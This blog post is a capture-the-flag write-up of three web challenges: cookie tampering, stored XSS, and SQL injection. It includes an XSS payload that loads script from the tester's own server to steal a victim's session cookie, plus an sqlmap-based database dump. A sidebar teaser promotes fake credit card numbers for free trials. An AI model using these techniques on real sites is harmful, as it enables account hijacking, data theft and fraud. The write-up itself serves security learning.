Friday, July 28, 2017

Web Penetration Testing - Reveal Flags

Web Penetration Testing 1 – Club Status

Turn on the intercept of burp suit and go to the web site. Then you can see the GET request. There are two cookies called PHPSESSID and vip. Then we have to edit the vip cookie value from 0 to 1 and forward the request.


Then you can see the page with the available Blog link. Then click the Blog link and the flag for this challenge is revealed.

  
1)      Web Penetration Testing 2 – Om nom nom nom


After completing challenge 1, you can browse in the Blog page. There is a user called Sycamore. Then go to the blog of Sycamore and there is a comment box. We can put comments on it. Then we have to find the vulnerabilities of this comment box. 

Type [<script>alert(“xss”)</script>](xss) in the comment box and submit it. You can see the alert message.


That’s it. We found the XSS vulnerability. The next step is to steal the PHPSESSID cookie of Sycamore. To do that, we have to host a server. We can create a file name .j containing some JavaScript to steal the user cookie. We can use pythons SimpleHTTPServer to host it on port 80.

Now we can create a XSS payload for the comment field. It looks like this.

[<script src=//<IP>/file.j>](test)

Add this comment to the blog page and wait some time. After a small time we can see the entries in the python server like this.


From that, we can get the cookie value of Sycamore. By loading the page with the cookie value we got from the server, the flag is revealed.




1)      Web Penetration Testing 3 – Nonce-sense

After looking around the site while logged in as Sycamore, we notice that users can delete comments. The CSRF token prevents automated tools from testing payloads. Burp has a feature for this using macros.
We need to setup burp with a new session handling rule, record a macro and use it to generate new CSRF tokens for requests.




We need add custom parameter for CSRF tokens.





We need to ensure that what parameter we want to macro to update.






We need to define the scope of the session.



Then go to the Repeater and press the Go button. When you press the Go button, you can get the different CSRF tokens.


You can test some Sql injection here by adding ‘ , after the comment_id=. So, we can notice that there is Sql injection vulnerability.


Get the request to a file and name it as “deletecomment_file”.


Now we have to do the rest using Sqlmap tool.



We can see the 5 tables in the cysca database. We use the “flag” table.



Finally, we can reveal the flag.




No comments:

Post a Comment

Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to ...